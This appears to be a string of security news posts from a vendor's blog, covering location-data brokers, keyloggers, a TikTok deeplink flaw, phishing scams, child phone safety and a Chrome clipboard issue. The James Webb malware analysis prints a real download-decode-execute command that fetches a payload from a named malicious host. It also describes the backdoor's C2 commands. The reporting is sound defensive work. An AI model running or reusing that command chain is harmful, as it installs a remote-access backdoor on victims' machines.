IT NEWS

The Federal Trade Commission (FTC) has sued data broker Kochava for allegedly selling information that would allow for individuals’ whereabouts to be traced to sensitive locations. The information included location data from hundreds of millions of phones, including sensitive locations that could be tied to an individual.

And, while the name Kochava may not ring any bells, it actually has a sizeable footprint in the data collection industry. In its own words, Kochava is the industry leader for mobile app attribution and mobile app analytics, and its platform provides a comprehensive set of measurement and targeting tools for app marketers.

While we are all more or less aware that advertisers spend a lot of money to enhance their targeted advertising strategies, there are boundaries to what the FTC will allow.

Buy and sell

Kochava is a location data broker that provides precise geolocation data from consumers’ smartphones and also purchases similar data sets from other brokers in order to resell them to clients. These data feeds are often used by clients who want to analyze things like foot traffic at local stores or other locations. Not only does it show the exact location of mobile devices, they are also associated with a unique identifier, like a device ID, as well as other information, like an IP address, device type and more.

This means that an exact location can be traced back to a unique individual. Kochava even boasts that one of the possibilities of the datasets is to identify households, for example by tracking where the phones “stay at night”.

This is exactly one of the objections brought up by the FTC. The data is not anonymized and can be used to identify the mobile device’s user or owner. Another reason why this is possible is because other data brokers specifically sell services that work to match Mobile Advertising IDs with offline information, like consumers’ names and physical addresses.

Sensitive locations

One of the restrictions the FTC takes a hard stance on are sensitive locations. As we can read in the complaint, the Federal Trade Commission filed the lawsuit against Kochava for selling geolocation data from hundreds of millions of mobile devices that can be used to trace the movements of individuals to and from sensitive locations.

As examples of sensitive locations the FTC lists:

• reproductive health clinics
• places of worship
• homeless and domestic violence shelters
• addiction recovery facilities

Having such information revealed could expose people to threats of stigma, stalking, discrimination, job loss, and even physical violence, the FTC explained. In an earlier article, we explained why Google has promised to delete location data of trips to sensitive locations.

Ruling to follow

The FTC is taking Kochava to court to protect people’s privacy and halt the sale of their sensitive geolocation information. Earlier this month, the FTC announced that it is exploring rules to crack down on harmful commercial surveillance practices that collect, analyze, and profit from information about people. The FTC files a complaint when it has reason to believe that the named defendants are violating or are about to violate the law and it appears to the Commission that a proceeding is in the public interest.

According to Kochava’s management

“this lawsuit shows the unfortunate reality that the FTC has a fundamental misunderstanding of Kochava’s data marketplace business and other data businesses. Kochava operates consistently and proactively in compliance with all rules and laws, including those specific to privacy.”

The case will be decided by the court. The complaint was filed in the U.S. District Court for the District of Idaho, where Kochava is based.

A blog post published earlier this year posed the question “Is Grammarly a keylogger?” I have personally had people reference that post and ask me to add detection of Grammarly to Malwarebytes. The answer has always been, “no.” Whether or not you like what Grammarly does, Grammarly is not a keylogger, according to the way that term is used by the security industry.

This begs the question: exactly what is a keylogger, then?

A keylogger is anything that logs keystrokes, right?

Well, no. This is way too broad a definition, since there are countless programs installed on every computer on earth designed to capture and save your keystrokes. Any word processor, for example. For that matter, any productivity software, whether that be a word processor, a notepad, a spreadsheet, a slideshow app, etc. Even something as low level as a Terminal window will record everything you type in the command history.

Using a computer made in the last several decades is all about typing things in a keyboard, and some program doing something with all those button presses. There’s a tongue-in-cheek saying about a common piece of advice for avoiding phishing attacks: you can’t tell the user to stop clicking things on the thing-clicking machine. Similarly, if you’re going to blow the whistle at anything that captures your keystrokes, you’re fighting a losing battle.

Is it something that sends your keystrokes somewhere?

We’re getting closer, but still no. Think about the things you use every day. A web browser, for example. Every time you type a search in a browser, what you type is sent off to the search engine of your choosing (most likely Google). Plus, there are tons of websites that will save things you type on the server. Consider Google docs, for example. Everything you type in such a document in your browser gets sent off to Google.

The web browser isn’t the only guilty party, of course. Consider Apple’s Notes app. Depending on your settings, everything you type in the Notes app will be synced to iCloud. The same is true of Microsoft’s OneNote app. For that matter – again, depending on your settings – doing a Spotlight search on your Mac can send everything you type in the search bar to Apple.

This is clearly where Grammarly lies. It collects keystrokes and sends them off your device for the purpose of having their backend system check the grammar of what you typed. Would it be better if it could do all that on the device? Certainly, though I know nothing of the technical reasons why that decision was made. Would I personally use Grammarly? Not a chance. However, there are many people who need a grammar checker and like the features Grammarly offers.

Clearly, these things are all legitimate apps, offering legitimate functionality. This definition is still too broad to be useful.

Then what IS a keylogger?

A more useful definition would be:

A keylogger is a program that collects keystrokes and sends them to a third-party, solely for the benefit of that third-party.

The key differentiator between a keylogger and something more legitimate is that it’s not collecting your keystrokes for your benefit. Instead, someone else intends to use what you typed for some purpose of their own, nefarious or otherwise. However, within this definition, there are a few different types of keyloggers.

“Potentially unwanted” keyloggers

A keylogger may be identified as a “PUP” (which stands for “Potentially Unwanted Program”) if it’s software that is sold legally and openly. Such programs are often marketed as tools for monitoring your children or employees, and as such have a theoretical legitimate use. (I have some strongly negative opinions about the use of keylogging software for such purposes, but to each their own.)

However, such keyloggers are also very commonly misused. In reality, legitimate usage of such keyloggers is probably dwarfed by illegitimate usage. People with access to someone else’s device can install them without the owner’s knowledge for unsavory – even malicious – reasons. This is quite common with intimate partner abuse, stalking, workplace harassment, etc.

For this reason, most security software will detect these so-called “legitimate” keyloggers as PUPs. Malwarebytes, as a member of the Coalition Against Stalkerware, is certainly no exception.

Adware keyloggers

These keyloggers are things that collect keystrokes within certain contexts for the purposes of targeting you with ads, building a profile to better understand you as a target for ads, or as a means of better understanding the entire customer base. An example of the type of data that such a program might collect would be every search you enter in your browser and every site you visit (whether that’s by typing the address in the address bar or clicking a link). Such programs often go well beyond just logging keystrokes, and will collect things such as your browser history, browser of choice, software installed on your computer, your location, etc.

These programs will generally trick the user into installing them, using a variety of lures. The old fake Adobe Flash Player installer trick is one of the most common, even now, when Flash is long dead. Generally speaking, though, these are spread in the form of trojans: ie, programs the user is tricked into downloading and running.

Such programs are either malware or just shy of malware, depending on your definition. Either way, they serve no legitimate purpose for anyone other than shady advertisers and deserve to be deleted with extreme prejudice. The only good news is that it is not the intent of these programs to harm you (though poor data handling practices by shady adware companies definitely could cause harm regardless of intent).

Malicious keyloggers

The most concerning category of keyloggers. These are the ones without any supposed “legitimate” purpose, and are intended for nothing but to steal your information. Such keyloggers are often used to collect sensitive information, such as account credentials, credit card numbers, social security numbers, and more.

Malicious keyloggers get onto your machine through a variety of means. They could be trojans, often using a lure more convincing than a fake Flash installer. They could infect your machine through a browser vulnerability that allows arbitrary code to execute. (This is less common on Macs than on Windows, but is nonetheless an increasing problem for Mac users.)

Such malware has also been known to have been installed manually, by attackers who have gotten access to the machine somehow, via physical or remote access. In a well-known case, the creator of the FruitFly malware is known to have used passwords obtained from data breaches to gain access to victims’ Macs. He used a process called “credential stuffing,” in which a password obtained from one online account is used to attempt to log in to something else. Since so many people reuse passwords, this is unfortunately a fairly reliable strategy.

In the case of malicious keyloggers, the software is rarely limited to just capturing keystrokes. Most malicious spyware has keylogging capabilities as only a part of the complete package, also including – among other things – file collection, capture of the screen contents, capture of video and audio via the webcam and microphone, and even execution of arbitrary commands. Thus, most such malware is not referred to as a “keylogger,” but rather is called “spyware.”

How do I protect myself from keyloggers?

Obviously, one way to do so is to use some kind of antivirus software, such as Malwarebytes. If you think you might be being targeted by someone using a PUP keylogger, make sure that the software you use detects such software. Membership in the Coalition Against Stalkerware would be a good indication of that.

You can avoid some of the common means that attackers may use to install a keylogger on your device by making sure you use a strong login password on your computer. Make sure it’s one that nobody could guess, and don’t leave your computer logged in and unattended. If you need to share your computer with someone, don’t let them use your account on the computer. Instead, create a separate account for that person and do not give them admin privileges. (On a Mac, this can be done in System Preferences -> Users & Groups.)

When it comes to the more malicious stuff, be careful about what you download. If a website tells you that you need to install something to see its content, or tells you that you’re infected and that you need to install something to fix it, run away screaming. (If you’re in a public place, you may want to consider just closing the browser window, though; otherwise you may get strange looks.)

It’s also critically important to keep your system up-to-date. Doing so ensures that your system is protected against known vulnerabilities that could be used to infect your device. On a Mac, go to System Preferences -> Software Update and check the box reading Automatically keep my Mac up to date.

Doing these things is never a guarantee, but they will go a long way towards reducing the chances of ever being affected by a keylogger.

Microsoft has released a detailed rundown of an issue, now fixed, which was potentially dangerous for users of TikTok. The problem, flagged as a “high-severity vulnerability” by Microsoft, required several steps chained together in order to function. Attackers making use of it could have compromised accounts with one click.

From there, the standard rules of engagement for compromised accounts apply. Sending messages, uploading content, checking out sensitive information or looking at private videos; all of this and more would have been possible. Worse, Microsoft determined that both versions of the TikTok app on Android were vulnerable to this issue. That’s around 1.5 billion installations in total, so it’s just as well TikTok received word of the vulnerability in February of this year and it’s now fixed.

Shall we take a look?

What is a deeplink?

To ward off any possible confusion, deeplinks are completely unrelated to deepfakes.

This issue is pinned around TikTok’s deeplink verification. These deeplinks can make URLs function in a variety of different ways. As Engadget explains, hitting a Twitter embed on Chrome mobile which opens the Twitter app is an example of this working in practice.

Where this goes wrong is when someone finds a way to bypass this deeplink verification, and make URLs behave in unexpected ways. As it happens, our old friend JavaScript is the first step in the chain to exploit success.

The perils of JavaScript interface injection

Exploitation was dependent on how the app implemented JavaScript interfaces, provided by something called WebView in the Android operating system which is used to load and display web pages. Untrusted content loaded up in WebView left the app vulnerable to something called JavaScript interface injection. This could lead to corrupted data, leakage, and even arbitrary code execution.

Microsoft found that several of these issues chained together with regard to handling a specific deeplink could force loading of arbitrary ULRs to the app’s WebView.

The fixed exploit now lives on only as CVE-2022-28799:

The TikTok application before 23.7.3 for Android allows account takeover. A crafted URL (unvalidated deeplink) can force the com.zhiliaoapp.musically WebView to load an arbitrary website. This may allow an attacker to leverage an attached JavaScript interface for the takeover with one click.

Fixes and suggestions

Microsoft has the following advice for app developers required to dabble with JavaScript interfaces:

• Use the default browser to open URLs that don’t belong to the application’s approved list.

• Keep the approved list up to date and track the expiration dates of the included domains. This can prevent attackers from hijacking WebView by claiming an expired domain on the approved list.

• Avoid using partial string comparison methods to compare and verify a URL with the approved list of trusted domains.

• Avoid adding stage or internal network domains to the approved list as these domains could be spoofed by an attacker to hijack WebView.

It’s important to note that Microsoft has seen no evidence of this being exploited in the wild. There is no need for users to be panicking about this particular exploit. There are many threats out there for users of TikTok like phishing and social engineering. This one, however, can be set aside as a highly technical “close, but no cigar”.

Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.

The WebKit zero-day that is known as CVE-2022-32893 was fixed for iOS 15.6.1, iPadOS 15.6, and macOS Monterey 12.5.1 on August 17, and for Safari in macOS Big Sur and macOS Catalina on August 18. This update applies to older devices running iOS 12.

Zero-day?

Technically this is not a zero-day, because by definition a zero-day is a software vulnerability previously unknown to those who should be interested in fixing it, like the vendor of the target. And since this vulnerability has been known for weeks it is no longer considered a zero-day, although users of older Apple OS versions were unable to install a patch for this vulnerability until now.

WebKit vulnerability

CVE-2022-32893 is an out-of-bounds write issue that was addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution. An attacker could lure a potential victim to a specially crafted website or use malvertising to compromise a vulnerable system by exploiting this vulnerability. The vulnerability exists in Apple’s HTML rendering software, WebKit, which powers all iOS web browsers and Safari, so possible targets are iPhones, iPads, and Macs which could all be tricked into running unauthorized code.

Apple has already said it’s aware of a report that the issue may have been actively exploited.

Not vulnerable

Apple mentions in the security update for CVE-2022-32893 that iOS 12 is not impacted by CVE-2022-32894. As we mentioned in our blog about the two actively exploited zero-days it seems likely that these vulnerabilities were found in an active attack that chained the two vulnerabilities together. The attack could, for example, be done in the form of a watering hole or as part of an exploit kit. CVE-2022-32893 could be exploited for initial code to be run, and this code could be used to leverage CVE-2022-32894 to obtain kernel privileges. This does not mean the WebKit vulneraility can do no harm on devices that are not vulnerable to CVE-2022-32894, as it could be chained with another vulnerability to obtain higher privileges,

Mitigation

Other than the information that the exploit has been used in the wild, Apple has not released any specifics about the vulnerability. The vulnerabilities are on the CISA list of vulnerabilities to be patched by September 8.

Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6.

Stay safe, everyone!

Final Fantasy 14, the smash-hit online role playing game, is under fire from scammers. The attack is a devious way to try and compromise player accounts, making use of free item promises and bogus QR codes.

As the game is a constantly changing service, it’s almost impossible to keep up with new features, offers, and content. The developers announce these changes on their blog, The Lodestone. What’s being talked about at the moment is the QR code-centric phishing attack.

The developers write:

As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth.

Please also be aware of the following methods used to direct players to fake pages:

・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums.

・Including a QR code in an image disguised as an official Twitter or forum post, and scanning the QR code displays fake pages.

・Disguising as a FFXIV game play video with a link to fake pages as part of the video or in the description.

Before opening any URLs, we urge you to confirm that they are legitimate and not a fraudulent imitation.

How the QR code phish attack works

Thanks to players grabbing screenshots, we can show you what these attacks typically look like.

Scammers send direct messages (tells) to other players. Many of the accounts sending these messages appear to have been hijacked themselves. A link is sent to the victim, directing them away from the game to image hosting services.

Literally just got a Tell like that and looked up to see if anyone else got anything similar lol pic.twitter.com/Y7en6WgxAi

— TheBlossomingLily♂ (Zack/”Lily”) (@LilyBlossoming) August 29, 2022

What waits for them is a screenshot of a faked Tweet from the official Final Fantasy 14 account.

hey #ffxiv community new tell scam where they will send a png link where it has a QR code please dont scan it because it will give them access to your personal info and possibly hack your phone

please stay safe! pic.twitter.com/FvtzL8IEzG

— hellfrog enthusiast 🐸🔥 (@hollownozuchi) August 29, 2022

It reads as follows:

We’ve decided to sneak another mount into the 6.2 release. Scan the QR code to automatically add the mount. This mount is only available until 4th September, after this date the mount will become tradeable and will be the only way to own this, so claim it now.

Mounts, pets, and other in-game items can be quite expensive. As a result, any promise of free items will no doubt catch some attention. Scanning the QR code will take the would-be item grabber to a fake login portal. Once the account is stolen, the scammers are free to use it to continue the phishing antics. Gaming accounts with a lot of in-game funds or items attached are of course very valuable. Depending on the game and how trading works, they may sell the account, or items, or trade other content. Final Fantasy 14 players are also at risk due to the perils of Real Money Trading. Often, phishing feeds into this activity too.

Avoiding the scam

In terms of bogus websites, Square Enix has this advice:

The Square Enix Account Management System complies with EV SSL certification. Should a website ask for your Square Enix Account information, please make sure that the website is legitimate before entering any information. On certain web browsers, the address bar will display an icon indicating the website’s security certificate. On a legitimate Square Enix Account Management System login page, clicking this security icon will display references to “SQUARE ENIX CO., LTD.”

* On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password.Examples of characteristics used in phishing URLs:

* The “s” is missing from “https” in the URL of the login page. The fake website will display http:// in the URL.

* The hyphen symbol is missing from “square-enix.” The fake website will display variations of “squareenix” in the URL.

* The letter “i” is replaced with various characters like “l” or “j.” The fake website will display “square-enlx” or “square-enjx.”

* The “com” in “square-enix.com” is replaced by various domains.

In terms of additional account security, you can make use of a One Time Password to further bolster your security defences. This can be done via an app, or through physical hardware tokens.

QR code scams are very popular in Final Fantasy land, and you can bet they’ll come back around in another form in the near future.

Stay safe out there!

Thanks to Thomas Reed for his expertise and guidance.

This is it.

After much hemming and hawing, you’ve finally given in and bought your child their first smartphone, which you plan to give to them before the school year starts.

But before you give it to them, it’s worth sitting them down to talk to them about things like what apps and sites they shouldn’t use or visit, what online behaviors to avoid engaging in, and what scams they need to look out for. There are also a few easy things you can do to the iPhone itself to make things a bit safer. Here are our suggestions:

Secure the iPhone

Often, when we think of protecting and securing, we also think of the worse possible scenarios. When it comes to smartphones, it’s losing them or having them stolen. Make sure you have the phone locked down every time it’s unattended or not used.

Help your child to choose a passcode for their iPhone, ensuring they can remember it to unlock the device. Set up an alternative way to unlock the phone, but use your biometrics. This is great to have for emergencies.

While we’re on the subject of losing phones, also make sure you—

Enable the Find My feature

That’ll make finding missing phones simpler and easier. You can find the step-by-step process here on Apple’s official site.

If you want to keep track of your child at necessary times, you can also use the Find My Friends feature. Just make sure that you talk to your child about using this first. If you have young adults, use the feature with their permission.

Set up your child’s own Apple ID

If a child is going to have their own iPhone, they should have and use their own Apple ID, too.

After creating your child’s Apple ID, enable two-factor authentication (2FA) for that added layer of security, ensuring that your child’s account won’t get popped easily even if someone got hold of their password.

Note that your child’s iCloud account is automatically created along with their Apple ID. Depending on how heavily they use this feature, you might want to consider purchasing a subscription that grants them some extra online storage. Maybe not now, but in the future.

Having an iCloud account benefits your child more than not having one. When they get older, they may also want to use their account on an iPad or want a newer phone model. An iCloud account makes this easier, but remember that having data in the cloud also has security and privacy risks attached to it.

Once your child has an Apple ID, you can set up Family Sharing on their device. By using this feature, you can not only hand pick what content to share with members of the family but also control the buying and downloading of games, ebooks, and apps on their device wherever you are.

Disable or hide features you deem off-limits or unnecessary

iPhones have features that young kids can use, and there are some that they just shouldn’t touch at all until they’re old enough or you explicitly give them permission to use.

Ideally, we don’t want our kids fiddling with Screen Time as there are lots of settings in there that they will just gladly change based on their preference. These settings include (among others):

• Content restrictions on Safari
• iTunes and App Store purchases
• Siri and Dictation
• Privacy settings (includes location services)

You can secure Screen Time by creating a passcode for it. Make sure you use a passcode that’s different from other passcodes you help set up with your child.

Depending on your child’s age, mental and emotional maturity, and how you want them to use their device, feel free to add more or remove some from the list above. For example, if your child is 10 or 11, you might want to hide the email feature for now until they’re a bit older. Remember, what you disable or hide should be non negotiable… at least until a later date, when you can review, assess, and adjust the above accordingly.

Limit or restrict features they can use

This is probably the hard part since your child is likely to have different views from you on what they should be allowed to do on their phone. When it comes to having social networking accounts, for instance, you may want to delay this for a few more years, even if the platform allows 13-year-old kids to use it.

Being in social networks at a young age is risky for children. Child predators camp on there, and not every piece of content shared within these environments is child-friendly. One study even showed that, apart from giving kids a different or unhealthy view of the real world, young children who are on TikTok began developing tics and having tic-like attacks brought about by anxiety and stress. They may also begin showing signs of mental health issues. 

As a parent and guardian, you can also limit screen time, which is easy to do using the iPhone’s Family Share feature. Apple has a guide on how to set this up as well.

If your child is into playing games on their iPhone, you might want to tweak Game Center settings, so they’re not exposed to potential risks needlessly. iOS can restrict adding friends, playing multiplayer games, and the sending of private messages (among others) on the Game Center.

The iPhone also has Guided Access that you can customize to put more limitations, such as limiting how long your child uses an app.

Do you have an old iPhone you want to hand down to your child instead of buying a new one? Make sure your files are properly backed up in iCloud, then you can wipe your data from the phone by performing a factory reset.

Final thoughts

Giving your kids a new smartphone doesn’t mean that you’re giving them free rein to do what they want to do with it. Walking them through the setup process and talking with them about what’s acceptable and not while also giving them an opportunity to speak up is a good way of showing—and reminding—your kids that, at the end of the day, you, the Parent or Guardian, is the boss.

You don’t even have to tell them that.

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.

Golang

Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.

VBA Macro

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open, AutoOpen, and AutoExec. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe  /c cd c:users{username}appdatalocal & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.

Payload

The malware payload copies itself into %localappdata%microsoftvault and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%microsoftwindowsMsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

• sleep to change timeout between C2 requests
• timeout to change timeout parameter in nslookup request
• all other commands will be executed with “cmd.exe /c”

Basically this allows the threat actor to execute arbitrary code on the affected machine.

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.

Malwarebytes also took the #1 spot for three different categories: 

1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

2. Vendor Support (Offers quality support): 84% user satisfaction 

3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 

Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

• 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

• 100 percent of ransomware blocked: Tested ‘in-house’ ransomware samples in-house (no possibly known signatures or community verdicts)

• 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

• 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

• 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though initially a small amount overall, the scammers quickly ramped things up. It’s not long before the victim complained that they were being asked for even more money. Eventually, they claim to have lost out on no less than a thousand US dollars. Of course, they still don’t have any idea where their luggage has ended up. Taking these amounts from people who are overseas, with no belongings, and a now potentially cleaned out bank account is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

• Airlines are not going to ask for additional fees or payment to help you look for your bags.
• Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
• Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
• If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari do require a user gesture before websites can copy content to the device’s clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl+C or other means to copy it to the clipboard. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch to On behind Clipboard history. Windows will now start keeping track of your clipboard content. To review the history up to 25 items you can use the Win+V keys.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The take-away from that article in the current context is that by pasting in a sensitive place, like the Terminal on a Mac, or a Command Prompt on a Windows machine, text can become a command that gets executed.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding user gesture requirement for readText and writeText APIs breaks NTP doodle sharing. NTP Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may come up with ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

• Do not open webpages between any cut/copy and paste actions.
• Check the content of your clipboard before you past into any sensitive areas. You can use any clipboard manager or just paste into a text field to see what is momentarily there. For those of you doing financial transactions this is always worth considering, since there is malware out there that can change bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!